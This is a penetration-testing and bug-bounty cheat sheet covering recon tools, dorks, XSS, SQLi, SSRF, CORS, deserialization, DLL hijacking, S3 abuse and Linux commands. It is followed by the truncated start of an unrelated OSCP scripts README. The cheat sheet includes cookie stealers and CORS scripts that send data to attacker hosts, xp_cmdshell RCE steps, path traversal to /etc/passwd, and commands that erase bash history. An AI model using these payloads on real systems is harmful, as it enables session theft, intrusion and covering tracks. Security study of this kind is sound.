[Flow](https://portswigger.net/bappstore/ee1c45f4cc084304b2af4b7e92c0a49d) - [Command Injection Attacker](https://portswigger.net/bappstore/33e4402eee514724b768c0342abadb8a) - [Copy As Python-Requests](https://portswigger.net/bappstore/b324647b6efa4b6a8f346389730df160) - [Directory Importer](https://portswigger.net/bappstore/59a829852f914d5a9edb6dcc919dc4e5) - [NGINX Alias Traversal](https://portswigger.net/bappstore/a5fdd2cdffa6410eb530de5a4c294d3a) - [Wordlist Extractor](https://portswigger.net/bappstore/21df56baa03d499c8439018fe075d3d7) - [IP Rotate](https://portswigger.net/bappstore/2eb2b1cb1cf34cc79cda36f0f9019874) <hr/> ### Content Discovery **Some tips** - If the application is ASP.NET, search for `Appsettings.json` - Use recursion. If you encounter a `401` response, search with waybackmachine - Search for past reports in the same program **Check the tech of a target with** - [Wappalyzer](https://www.wappalyzer.com/) - [Webanalyze](https://github.com/rverton/webanalyze) Port of Wappalyzer for command line `./webanalyze -host example.com -crawl 1` **Tools** - [feroxbuster](https://github.com/epi052/feroxbuster) `feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403` - [dirsearch](https://github.com/maurosoria/dirsearch) - [changedetection.io](https://github.com/dgtlmoon/changedetection.io) - [ffuf](https://github.com/ffuf/ffuf) **Wordlists** - [SecLists](https://github.com/danielmiessler/SecLists) - [wordlists.assetnote.io](https://wordlists.assetnote.io/) - [content_discovery_all.txt](https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10) - [OneListForAll](https://github.com/six2dez/OneListForAll) - [wordlistgen](https://github.com/ameenmaali/wordlistgen) - [Scavenger](https://github.com/0xDexter0us/Scavenger) **Other tools** - [Apkleak](https://github.com/dwisiswant0/apkleaks) to get endpoints from an apk - [Source2Url](https://github.com/danielmiessler/Source2URL/blob/master/Source2URL) to get endpoints from a source code - [waymore](https://github.com/xnl-h4ck3r/waymore) more results from the Wayback Machine **Google Dorking** - `ext:` to search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form; - Search also for pdf, xlsx and similar, they may contain some infos; - `site:` to target a website and its subdomains; - `inurl:&` to search for parameters; - `intitle:` to search interesting pages like admin, register, login etc. - [Dorking on Steroids](https://hazanasec.github.io/2021-03-11-Dorking-on-Steriods/) - `"Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com` [[Reference](https://twitter.com/c3l3si4n/status/1580564006263173122)] - [dorks_hunter](https://github.com/six2dez/dorks_hunter) **GitHub Dorking** - sensitive words: `password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret` - languages: `json, bash, shell, java etc.`, example `HEROKU_API_KEY language:json` - extensions: `extensions: bat, config, ini, env etc.` - filename: `netrpc, .git-credentials, .history, .htpasswd, bash_history` <hr/> ### Bash Read a file line by line with a script like `./bash.sh filename` ```bash file=$1 while read -r line; do echo -e "$line" done <$file ``` <hr/> ### XSS - [Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/) - [For hidden inputs](https://portswigger.net/research/xss-in-hidden-input-fields): `accesskey="X" onclick="alert(1)"` then Press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X - For **mobile applications**: try use as a vector the name of the phone with a payload like `"/><script>alert(1)</script>` - For **desktop applications**: try use as a vector the SSID with a payload like `"/><img src=x onerror=alert(1)>` **Tools** - [xsscrapy](https://github.com/DanMcInerney/xsscrapy) - [XSS Hunter](https://xsshunter.com/) for blind XSS - [XSS Validator](https://portswigger.net/bappstore/98275a25394a417c9480f58740c1d981) - [Trishul](https://github.com/gauravnarwani97/Trishul) - [AwesomeXSS](https://github.com/s0md3v/AwesomeXSS) **CSP bypass** - [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com/) - [CSP Auditor](https://portswigger.net/bappstore/35237408a06043e9945a11016fcbac18) - [CSP Bypass](https://github.com/PortSwigger/csp-bypass) **Bypasses** - https://www.googleapis.com/customsearch/v1?callback=alert(document.domain) - [JSFuck](http://www.jsfuck.com/) - [Path Relative style sheet injection](https://portswigger.net/kb/issues/00200328_path-relative-style-sheet-import) - [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [Shortest rXSS possible](https://brutelogic.com.br/blog/shortest-reflected-xss-possible/) - If Privileges are required, see if you can chain the XSS with a CSRF **Swagger XSS** - https://github.com/swagger-api/swagger-ui/issues/1262 - https://github.com/swagger-api/swagger-ui/issues/3847<br/> `?url=https://raw.githubusercontent.com/seeu-inspace/easyg/main/XSS%20all%20the%20things/swag-test.json` - [Hacking Swagger-UI - from XSS to account takeovers](https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/)<br/> `?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3NlZXUtaW5zcGFjZS9lYXN5Zy9tYWluL1hTUyUyMGFsbCUyMHRoZSUyMHRoaW5ncy9zd2FnLXRlc3QueWFtbCIKfQ==` - Nuclei template `%USERPROFILE%\nuclei-templates\exposures\apis\swagger-api.yaml` **CRLF injection** [[Reference](https://www.acunetix.com/websitesecurity/crlf-injection/)] - `/%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--` - `/%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--` - Nuclei template `%USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml` **Cross Site Tracing** If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. Reference: https://owasp.org/www-community/attacks/Cross_Site_Tracing **Blind XSS** - Insert a payload in the User-Agent, try with the match/replace rule - Other endpoints: pending review comments, feedback **DoS** `%22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D` This could lead the page to refresh quickly and infinitely causing being blocked by a WAF and being a potential DoS. **Payloads** - HTML inj ```HTML <p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden"> ``` - iframe + base64 encoded SVG ```HTML <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgICAgIGFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe> ``` - Cookie stealers - ```JavaScript fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie}); ``` - ```JavaScript document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />') ``` - ```HTML <img src=x onerror=this.src='http://ATTACKER-WEBSITE/?'+document.cookie;> ``` <hr/> ### SQLi **Tools** - [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) - [sqlmap](https://sqlmap.org/) ``` > SQLMap: sqlmap -u https://vulnerable/index.php?id=1 --tables (to see db) -D DATABASE_NAME -T TABLE_NAME --dump (to see data) --forms --batch --crawl=10 --random-agent --level=5 --risk=3 (to crawl) ``` **RCE** ```sql EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell 'COMMAND'; ``` ``` EXEC sp_configure 'allow updates', 0 RECONFIGURE EXEC sp_configure 'show advanced options', 1 GO RECONFIGURE GO EXEC sp_configure 'xp_cmdshell', 1 GO RECONFIGURE GO xp_cmdshell 'COMMAND'; ``` <hr/> ### SSRF SSRF with blacklist-based input filters bypass: Some applications block input containing hostnames like `127.0.0.1` and localhost, or sensitive URLs like `/admin`. In this situation, you can often circumvent the filter using various techniques: - Using an alternative IP representation of `127.0.0.1`, such as `2130706433`, `017700000001`, or `127.1`; - Registering your own domain name that resolves to `127.0.0.1`. You can use spoofed.burpcollaborator.net for this purpose or the domain `firefox.fr` is a DNS that point to `127.0.0.1`.; - Obfuscating blocked strings using URL encoding or case variation. SSRF with whitelist-based input filters bypass - You can embed credentials in a URL before the hostname, using the `@` character. For example: `https://expected-host@evil-host`. - You can use the `#` character to indicate a URL fragment. For example: `https://evil-host#expected-host`. - You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: `https://expected-host.evil-host`. - You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request. - You can use combinations of these techniques together. Other tips - By combining it with an open redirect, you can bypass some restrictions. [An example](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection): `http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos` - Open Redirect Bypass: - https://subdomain.victim.com/r/redir?url=https%3A%2F%2Fvictim.com%40ATTACKER_WEBSITE.COM?x=subdomain.victim.com%2f - For AWS, bypass some restrictions by hosting this PHP page ([Reference](https://hackerone.com/reports/508459)): ```PHP <?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?> ``` - If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [[Reference](https://twitter.com/bogdantcaciuc7/status/1561572514295341058)] Burp extensions - [Collaborator Everywhere](https://portswigger.net/bappstore/2495f6fb364d48c3b6c984e226c02968) <hr/> ### Authentication vulnerabilities - Multi-factor authentication - Try to intercept the response and modify the status to `200`; - Bruteforce. - Password reset - Change the `Host` with the host of your server. The request for a password reset might use the `Host` value for the link with the reset token; - Try with headers like `X-Forwarded-Host:`. - [Password change](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change) - [Keeping users logged in](https://portswigger.net/web-security/authentication/other-mechanisms/lab-brute-forcing-a-stay-logged-in-cookie) <hr/> ### Access control vulnerabilities and privilege escalation In the context of web applications, access control is dependent on authentication and session management: - Authentication identifies the user and confirms that they are who they say they are; - Session management identifies which subsequent HTTP requests are being made by that same user; - Access control determines whether the user is allowed to carry out the action that they are attempting to perform. From a user perspective, access controls can be divided into the following categories: - Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users - Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources - Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it **Tools** - [Autorize](https://github.com/PortSwigger/autorize) - [Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e) - [UUID Detector](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248) - Check also endpoints in JS files, see [tools](#tools) <hr/> ### Directory Traversal - simple case `https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini` - absolute path `https://insecure-website.com/loadImage?filename=/etc/passwd` - stripped non-recursively `https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd` - superfluous URL-decode `https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd` - validation of start of path `https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd` - validation of start of path `https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png` <hr/> ### Business logic vulnerabilities Examples: - Excessive trust in client-side controls - 2FA broken logic - Failing to handle unconventional input - Inconsistent security controls - Weak isolation on dual-use endpoint - Password reset broken logic - Insufficient workflow validation - Flawed enforcement of business rules - [Authentication bypass via encryption oracle](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-authentication-bypass-via-encryption-oracle) <hr/> ### CORS Classic CORS vulnerability ```HTML <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','$url/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> ``` CORS vulnerability with null origin ```HTML <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','vulnerable-website.com/sensitive-victim-data',true); req.withCredentials = true; req.send(); function reqListener() { location='malicious-website.com/log?key='+this.responseText; };</script>"> </iframe> ``` CORS vulnerability with trusted insecure protocols ```HTML <script> document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script> ``` **Tools** - [Corsy](https://github.com/s0md3v/Corsy) Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations <hr/> ### Deserialization **Ysoserial** Because of `Runtime.exec()`, ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using `sh -c $@|sh . echo ` before the multiple commands that we need to run. Here I needed to run the command `host` and `whoami`: ``` java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-'RATOR-ID>.burpcollaborator.net' | gzip | base64 ``` [PHPGGC](https://github.com/ambionics/phpggc) is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically. Burp extensions: - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) - [Java Serialized Payloads](https://portswigger.net/bappstore/bc737909a5d742eab91544705c14d34f) - [GadgetProbe](https://portswigger.net/bappstore/e20cad259d73403bba5ac4e393a8583f) - [Freddy, Deserialization Bug Finder](https://portswigger.net/bappstore/ae1cce0c6d6c47528b4af35faebc3ab3) - [PHP Object Injection Check](https://portswigger.net/bappstore/24dab228311049d89a27a4d721e17ef7) <hr/> ### HTTP Host header attacks - "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [[Reference](https://hackerone.com/reports/310105)]; - CRLF injection [[Reference](https://www.acunetix.com/websitesecurity/crlf-injection/)], "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [[Reference](https://twitter.com/albinowax/status/1412778191119396864)] <hr/> ### DLL Hijacking **Tools** - [Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) to see which DLLs are missing for an exe and do DLL Hijacking Using Process Monitor, set the filters to find missing dlls.<br/><br/> <img src="https://raw.githubusercontent.com/seeu-inspace/easyg/main/img/procmon-config.png" alt="procmon-config"> After that, insert the dll in the position of the missing ones with the same name. An example of a dll: ```c++ #include <windows.h> BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { switch (dwReason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "success!!", "pwned", MB_ICONERROR | MB_OK ); break; } return TRUE; } ``` **Resources** - [hijacklibs.net](https://hijacklibs.net/) - [Save the Environment (Variable)](https://www.wietzebeukema.nl/blog/save-the-environment-variables) <hr/> ### Abusing S3 Bucket Permissions Target example: `http://[name_of_bucket].s3.amazonaws.com` **Read Permission** - `aws s3 ls s3://[name_of_bucket] --no-sign-request` - `aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize` **Write Permission** - `aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request` **READ_ACP** - `aws s3api get-bucket-acl --bucket [bucketname] --no-sign` - `aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request` **WRITE_ACP** - `aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request` - `aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request` **Tools** - [Anonymous Cloud](https://portswigger.net/bappstore/ea60f107b25d44ddb59c1aee3786c6a1) - [AWS CLI](https://aws.amazon.com/it/cli/) - [S3Scanner](https://github.com/sa7mon/S3Scanner) A tool to find open S3 buckets and dump their contents - [Cloud - AWS Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md) **Resources** - https://blog.yeswehack.com/yeswerhackers/abusing-s3-bucket-permissions/ - https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_s3_rw-bucket.html <hr /> ### GraphQL To analyze the schema: [vangoncharov.github.io/graphql-voyager/](https://ivangoncharov.github.io/graphql-voyager/) or [InQL](https://github.com/doyensec/inql) for Burp Suite. **GraphQL Introspection query** ``` {"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} ``` ``` {query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}} ``` ``` {"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n __schema {\n queryType {\n name\n }\n mutationType {\n name\n }\n subscriptionType {\n name\n }\n types {\n ...FullType\n }\n directives {\n name\n description\n locations\n args {\n ...InputValue\n }\n }\n }\n}\n\nfragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n}\n\nfragment InputValue on __InputValue {\n name\n description\n type {\n ...TypeRef\n }\n defaultValue\n}\n\nfragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n}\n"} ``` <hr/> ### WordPress - Information Disclosure [high]: `/_wpeprivate/config.json` - Data exposure: - `/wp-json/wp/v2/users/` - `/wp-json/th/v1/user_generation` - `/?rest_route=/wp/v2/users` - xmlrpc.php enabled, [reference](https://hackerone.com/reports/138869). Send a post request to this endpoint with a body like this: ```xml <?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall> ``` - Use [Nuclei](https://github.com/projectdiscovery/nuclei) to detect WordPress websites from a list of targets with: `nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml` - Scan with WPScan [github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) with: `wpscan --url <domain> --api-token <your-api-token>` More here: https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ <hr/> ### IIS - Internet Information Services - Wordlist [iisfinal.txt](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services#iis-discovery-bruteforce) - Check if `trace.axd` is enabled - [Other common files](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services#common-files) - Search for ``` Views/web.config bin/WebApplication1.dll System.Web.Mvc.dll System.Web.Mvc.Ajax.dll System.Web.Mvc.Html.dll System.Web.Optimization.dll System.Web.Routing.dll ``` Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services <hr/> ### Lotus Domino - Find Lotus Domino with nuclei: `%USERPROFILE%\nuclei-templates\technologies\lotus-domino-version.yaml` - Exploit DB: [Lotus-Domino](https://www.exploit-db.com/search?q=Lotus+Domino) - Fuzzing list: [SecLists/LotusNotes.fuzz.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/LotusNotes.fuzz.txt) <hr/> ### Network ``` ip route add <net_address_in_cdr> via <interface_gateway> route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway> (Windows) nmap -sn <net_address_in_cdr> | Check hosts alive, adding -A you gather more info for a target ``` <hr/> ### Linux **Linux Commands** ``` netstat -tulpn Show Linux network ports with process ID’s (PIDs) watch ss -stplu Watch TCP, UDP open ports in real time with socket summary. lsof -i Show established connections. macchanger -m MACADDR INTR Change MAC address on KALI Linux. ifconfig eth0 192.168.2.1/24 Set IP address in Linux. ifconfig eth0:1 192.168.2.3/24 Add IP address to existing network interface in Linux. ifconfig eth0 hw ether MACADDR Change MAC address in Linux using ifconfig. ifconfig eth0 mtu 1500 Change MTU size Linux using ifconfig, change 1500 to your desired MTU. dig -x 192.168.1.1 Dig reverse lookup on an IP address. host 192.168.1.1 Reverse lookup on an IP address, in case dig is not installed. dig @192.168.2.2 domain.com -t AXFR Perform a DNS zone transfer using dig. host -l domain.com nameserver Perform a DNS zone transfer using host. nbtstat -A x.x.x.x Get hostname for IP address. ip addr add 192.168.2.22/24 dev eth0 Adds a hidden IP address to Linux, does not show up when performing an ifconfig. tcpkill -9 host google.com Blocks access to google.com from the host machine. echo \"1\" > /proc/sys/net/ipv4/ip_forward Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box. echo \"8.8.8.8\" > /etc/resolv.conf Use Google DNS. ``` **Linux User Management** ``` whoami Shows currently logged in user on Linux. id Shows currently logged in user and groups for the user. last Shows last logged in users. mount Show mounted drives. df -h Shows disk usage in human readable output. echo \"user:passwd\" | chpasswd Reset password in one line. getent passwd List users on Linux. strings /usr/local/bin/blah Shows contents of none text files, e.g. whats in a binary. uname -ar Shows running kernel version. PATH=$PATH:/my/new-path Add a new PATH, handy for local FS manipulation. history Show bash history, commands the user has entered previously. ``` **Linux File Commands** ``` df -h blah Display size of file / dir Linux. diff file1 file2 Compare / Show differences between two files on Linux. md5sum file Generate MD5SUM Linux. md5sum -c blah.iso.md5 Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir. file blah Find out the type of file on Linux, also displays if file is 32 or 64 bit. dos2unix Convert Windows line endings to Unix / Linux. base64 < input-file > output-file Base64 encodes input file and outputs a Base64 encoded file called output-file. base64 -d < input-file > output-file Base64 decodes input file and outputs a Base64 decoded file called output-file. touch -r ref-file new-file Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file. rm -rf Remove files and directories without prompting for confirmation. ``` **Misc Commands** ``` init 6 Reboot Linux from the command line. gcc -o output.c input.c Compile C code. gcc -m32 -o output.c input.c Cross compile C code, compile 32 bit binary on 64 bit Linux. unset HISTORYFILE Disable bash history logging. rdesktop X.X.X.X Connect to RDP server from Linux. kill -9 $$ Kill current session. chown user:group blah Change owner of file or dir. chown -R user:group blah Change owner of file or dir and all underlying files / dirs – recersive chown. chmod 600 file Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details. ssh [email protected] | cat /dev/null > ~/.bash_history Clear bash history ``` **Linux File System Permissions** ``` 777 rwxrwxrwx No restriction, global WRX any user can do anything. 755 rwxr-xr-x Owner has full access, others can read and execute the file. 700 rwx------ Owner has full access, no one else has access. 666 rw-rw-rw- All users can read and write but not execute. 644 rw-r--r-- Owner can read and write, everyone else can read. 600 rw------- Owner can read and write, everyone else has no access. ``` **Linux Directories** ``` / / also know as “slash” or the root. /bin Common programs, shared by the system, the system administrator and the users. /boot Boot files, boot loader (grub), kernels, vmlinuz /dev Contains references to system devices, files with special properties. /etc Important system config files. /home Home directories for system users. /lib Library files, includes files for all kinds of programs needed by the system and the users. /lost+found Files that were saved during failures are here. /mnt Standard mount point for external file systems. /media Mount point for external file systems (on some distros). /net Standard mount point for entire remote file systems – nfs. /opt Typically contains extra and third party software. /proc A virtual file system containing information about system resources. /root root users home dir. /sbin Programs for use by the system and the system administrator. /tmp Temporary space for use by the system, cleaned upon reboot. /usr Programs, libraries, documentation etc. for all user-related programs. /var Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc. ``` **Linux Interesting Files / Directories** ``` /etc/passwd Contains local Linux users. /etc/shadow Contains local account password hashes. /etc/group Contains local account groups. /etc/init.d/ Contains service init script – worth a look to see whats installed. /etc/hostname System hostname. /etc/network/interfaces Network interfaces. /etc/resolv.conf System DNS servers. /etc/profile System environment variables. ~/.ssh/ SSH keys. ~/.bash_history Users bash history log. /var/log/ Linux system log files are typically stored here. /var/adm/ UNIX system log files are typically stored here. /var/log/apache2/access.log Apache access log file typical path. /var/log/httpd/access.log Apache access log file typical path. /etc/fstab File system mounts. ```
# OSCP_Scripts The following repo includes scripts I created to assist with automating some tasks for the OSCP v2.0 exam. All of my scripts were made in bash. I will not be maintaining this repo. ## my_notes/cheat-sheet.md This is not a script, but all of my notes I took for the OSCP test. This file is huge. However it includes a lot of good examples for commands. Note: there are probably lots of spelling mistakes in this file, sorry ahead of time. use this .md file in the following way: - Search for a binary or a command, use the examples I share if you like. ## BadCharChecker Dependencies: none BadCharChecker is used for BOF attacks when using Imunity Debugger on Windows exploits. Its purpose is to find bad characters from an ESP dump. To use do the following. When you ready to check for bad characters in your stack buffer overflow attack, use this tool in the following way: - Adjust your POC code to send a string of all bad chars (recommend sending after a string of A's (\x41) so its easier to find in the ESP dump.) - Run the vulnerable binary. Attach to Immunity Debugger. - Run your POC code to send A's + Bad Characters string. - Inside Immunity Debugger: Dump ESP - Copy Immunity Debugger ESP Hex dump output. Only copy characters that Need to be checked. Note: Take a look in example_files/bc01, if you want to see what copy of Immunity Debugger ESP dump looks like - Paste into a file on Kali (Example: bc01). > BadCharChecker bc01 - BadCharChecker will display some information. - User identified bad chars: These are the chars you passed in via $2 - Chars missing from AllChars & User identified bad chars: Bad chars found not identified by user input. This will display "None! :)" if there are none. This means you identified all BadChars list is good. - Chars missing form AllChars: Exact chars missing from all chars, these are considered the actual bad chars. - Update your POC code to remove bad chars. - Repeat until BadCharChecker finds all Bad chars. ## LEC (Little Endian Converter) Dependencies: none LEC is used for BOF attacks when using ImmunityDebugger on Windows exploits. Its purpose is to be used when you want to convert a registry address to Little endian format. I mainly used this after I ran `!mona find -s "\xff\xe4" -m "dependencyfoundname.exe"`. I would then copy any addresses that appear in Immunity Debugger to my clipboard, and run them against LEC. LEC will convert the registry location to Little Endian and output in C and python syntax. Use this tool in the following way: - Copy a registry location address from Immunity Debugger to your clipboard > LEC 81356039 - Copy output to your code as needed. ## HTTP Dependencies: python HTTP is just a wrapper over the python simpleHTTPServer. I created this because, I didn't like having to type out "python -m SimpleHTTPServer 1234" over and over again. Also I wanted something that would list all files recursively as URL paths, so I can copy them quickly. Use this tool in the following way: - cd to the directory you want to share. WARNING: It is recommended to share a directory with not many sub directories. - perform a "ip -br addr show" to find the IP address of the interface you want to share on. - choose a port (Example: 1234) > HTTP 192.168.5.22 1234 - HTTP will list all files in a url path form and run the python simple server. This tool works great in combination with tmux search. Try the following after running HTTP and have output: - Enter tmux copy mode - Default: "CTRL+B" then press "[" - Search up - Default: "SHIFT+n" then type the word your looking for and press "ENTER". - Copy the URL path you found. ## webgrabber Dependencies: cutycapt, jq(for ffuf json files), firefox (by default this is the browser configured to open files) webgrabber is a wrapper around cutycapt. You MUST have cutycapt installed and in your path for webgrabber to work. The purpose of webgrabber is to quickly iterate though a directory buster output file, go to each url's web interface, take a picture of what it looks like, append it to a HTML file, and open in firefox. The web page will include The link, image location, the image. This works with HTTP and HTTPS, however I have had more sucess with HTTP. Supported dir busters / file format: - gobuster (use gobuster's "-o" parameter to create a file of results) - feroxbuster (use feroxbuster's "-o" parameter to create a file of results) - ffuf (use ffuf's "-o" parameter, and specify format with "-of". Note: jq is required for json formatted files) Use this tool in the following way: - Perform a web directory enumeration with gobuster, feroxbuster, or ffuf, make sure to create an output file with one of the above supported methods - run webgrabber, here are some examples. > webgrabber -s http://10.10.10.10 -f <gobusterfile> -e gb" > webgrabber -s https://10.10.10.10 -f <gobusterfile> -e gb" > webgrabber -s http://10.10.10.10:8080 -f <feroxbusterfile> -e fb" > webgrabber -s https://10.10.10.10:4443 -f <ffuf csv file> -e ff" ## lsc (ls cat) 